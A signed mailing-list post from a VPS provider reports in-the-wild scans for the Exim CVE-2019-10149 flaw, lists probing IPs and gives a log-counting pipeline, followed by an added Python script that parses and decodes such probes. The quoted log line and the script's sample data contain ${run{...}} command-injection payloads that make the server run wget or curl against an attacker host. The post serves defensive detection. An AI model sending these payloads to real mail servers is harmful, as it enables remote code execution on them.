Author: Andy Smith
Date:  
To: users
Subject: [bitfolk] Scans attempting to exploit CVE-2019-10149 have been in the wild for some days

gpg: Signature made Sun Jun 23 03:24:51 2019 UTC
gpg: using DSA key 2099B64CBF15490B
gpg: Good signature from "Andy Smith <andy@strugglers.net>" [unknown]
Hello,

I've just run a grep on all of my mail logs for the string "run{" to
see who's been trying to exploit CVE-2019-10149. A successful match
looks like this on my MTA (Exim):

2019-06-19 14:57:19 H=li810-176.members.linode.com (service.com) [104.237.134.176] F=<support@???> rejected RCPT <root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2064.50.180.45\x2ftmp\x2f85.119.82.70\x22}}@???>: Unrouteable address

This appears to be attempting to execute:

    sh -c "wget 64.50.180.45/tmp/85.119.82.70"

on my host. I assume that the attacker watches their HTTP logs for
requests for /tmp/85.119.82.70 and then they know they've found an
exploitable host.

Here's a list of offenders sorted by attempt count:

Count  Attacker                                       Country AS
-------------------------------------------------------------------------------------------------
   18  89.248.171.57   ( scanner20.openportstats.com) NL      INT-NETWORK, SC [AS202425]
    8  163.172.157.143 (143-157-172-163.rev.cloud.scaleway.com) GB      AS12876, FR [AS12876]
    6  104.237.134.176 (li810-176.members.linode.com) US      LINODE-AP Linode, LLC, US [AS63949]
    3  149.56.142.192  (       192.ip-149-56-142.net) CA      OVH, FR    [AS16276]
    3  104.200.137.239 (        mx239.odesktrack.com) US      TOTAL-SERVER-SOLUTIONS - Total Server Solutions L.L.C., US [AS46562]
    2  27.69.172.229   (                   localhost) VN      VIETEL-AS-AP Viettel Group, VN [AS7552]
    1  95.139.230.110  (node-110-230-139-95.domolink.tula.net) RU      ROSTELECOM-AS, RU [AS12389]
    1  79.173.123.131  (           Unset reverse DNS) RU      TKTOR, RU  [AS44270]
    1  46.150.228.178  (           Unset reverse DNS) RU      ABRIKOS-AS, RU [AS196768]
    1  27.70.156.161   (                   localhost) VN      VIETEL-AS-AP Viettel Group, VN [AS7552]
    1  27.69.172.239   (                   localhost) VN      VIETEL-AS-AP Viettel Group, VN [AS7552]
    1  27.69.172.214   (                   localhost) VN      VIETEL-AS-AP Viettel Group, VN [AS7552]


Most worrying, a BitFolk IP was amongst my findings, i.e. there is a
BitFolk customer VPS also doing this. Most likely they have already
been compromised by this technique. I've removed them from the
results above but I expect if you search your own logs you'll find
them. They have already been notified.

I created the above output with this script:

https://gist.github.com/grifferz/f92a9c885443a0db8776c4f2f10f914f

To use it in this case would be something like:

$ zcat -f /var/log/exim4/mainlog* \
    | grep "run{" \
    | awk -F'[' '{ gsub(/\].*/, "", $2); print $2 }' \
    | sort | uniq -c | sort -rn | ~/attackers.sh


The awk is separating an IP address out of the [1.2.3.4]. The
sort/uniq/sort is generating an event count. attackers.sh is merely
getting extra info about the IP address.

Cheers,
Andy

--
https://bitfolk.com/ -- No-nonsense VPS hosting
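Added example, not part of the message above and not Andy's attackers.sh gist: a Python version of the same log search. Like the grep/awk/sort pipeline it counts probing client IPs, but it also decodes the backslash escapes inside the ${run{...}} payload so the command the attacker tried to execute can be read, and pulls the IPv4 literals out of that command as indicators. The embedded log lines are constructed in Exim mainlog format using documentation address ranges; `decode_exim_escapes` handles the \xHH, \t, \n, \r and \\ forms seen in these probes and leaves anything else (such as octal escapes) untouched.

```python
"""Find CVE-2019-10149 probes in Exim mainlog lines and decode the payload.

Example code added to the archived post; not the original author's script.
"""
import re
import shlex
from collections import Counter

# Constructed sample lines in Exim mainlog format (documentation addresses):
# two probes from one host, one from another, and an ordinary rejection
# that must not match.
SAMPLE_LOG = r"""2019-06-19 14:57:19 H=li810-176.members.linode.com (service.com) [104.237.134.176] F=<support@example.invalid> rejected RCPT <root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x20198.51.100.7\x2ftmp\x2f203.0.113.9\x22}}@example.invalid>: Unrouteable address
2019-06-19 15:02:40 H=(localhost) [198.51.100.23] F=<a@example.invalid> rejected RCPT <root+${run{\x2Fbin\x2Fsh\t-c\t\x22curl\x20198.51.100.7\x2fx\x22}}@example.invalid>: Unrouteable address
2019-06-19 15:10:01 H=li810-176.members.linode.com (service.com) [104.237.134.176] F=<support@example.invalid> rejected RCPT <root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x20198.51.100.7\x2ftmp\x2f203.0.113.9\x22}}@example.invalid>: Unrouteable address
2019-06-19 15:11:00 H=mail.example.invalid [192.0.2.5] F=<bob@example.invalid> rejected RCPT <nobody@example.invalid>: Unrouteable address
"""

# The probe sits in the recipient local part as ${run{<escaped command>}}.
RUN_RE = re.compile(r"\$\{run\{(?P<payload>.*?)\}\}")
# Exim logs the connecting client's address in square brackets after H=.
CLIENT_IP_RE = re.compile(r"\sH=.*?\[(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\]")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# Escape forms handled here; Exim's expander also accepts others (e.g. octal).
ESCAPE_RE = re.compile(r"\\([xX][0-9A-Fa-f]{2}|[ntr\\])")


def decode_exim_escapes(payload: str) -> str:
    """Expand \\xHH, \\n, \\t, \\r and \\\\ into the characters they stand for."""
    table = {"n": "\n", "t": "\t", "r": "\r", "\\": "\\"}

    def sub(m: re.Match) -> str:
        esc = m.group(1)
        if esc[0] in "xX":
            return chr(int(esc[1:], 16))
        return table[esc]

    return ESCAPE_RE.sub(sub, payload)


def parse_probe(line: str):
    """Describe the probe in one log line, or return None if there is none."""
    run = RUN_RE.search(line)
    if not run:
        return None
    ip = CLIENT_IP_RE.search(line)
    command = decode_exim_escapes(run.group("payload"))
    try:
        # ${run{...}} is split into argv on whitespace with shell-style quoting;
        # shlex gives the same view of the decoded string.
        argv = shlex.split(command)
    except ValueError:  # unbalanced quotes in a malformed payload
        argv = command.split()
    return {
        "timestamp": line[:19],
        "ip": ip.group("ip") if ip else None,
        "command": command,
        "argv": argv,
        # IPv4 literals inside the command: the download/callback host(s).
        "indicators": sorted(set(IPV4_RE.findall(command))),
    }


def find_probes(log_text: str):
    """All probes in the log text, in file order."""
    return [p for p in (parse_probe(l) for l in log_text.splitlines()) if p]


def count_by_source(log_text: str) -> Counter:
    """Equivalent of the post's awk | sort | uniq -c step: probes per client IP."""
    return Counter(p["ip"] for p in find_probes(log_text) if p["ip"])


if __name__ == "__main__":
    import sys

    # Pass mainlog files as arguments (e.g. after zcat -f to a temp file) to
    # analyse real logs; with no arguments the constructed sample is used.
    text = "".join(open(f, encoding="utf-8", errors="replace").read()
                   for f in sys.argv[1:]) or SAMPLE_LOG
    for ip, n in count_by_source(text).most_common():
        print(f"{n:5d}  {ip}")
    for p in find_probes(text):
        print(p["timestamp"], p["ip"], p["argv"], p["indicators"])
```

The decoded argv is what matters for triage: the rejection itself only shows that a host was probed, while the command reveals the fetch target that the attacker would watch for in their HTTP logs, which is a useful indicator to search outbound proxy or firewall logs for.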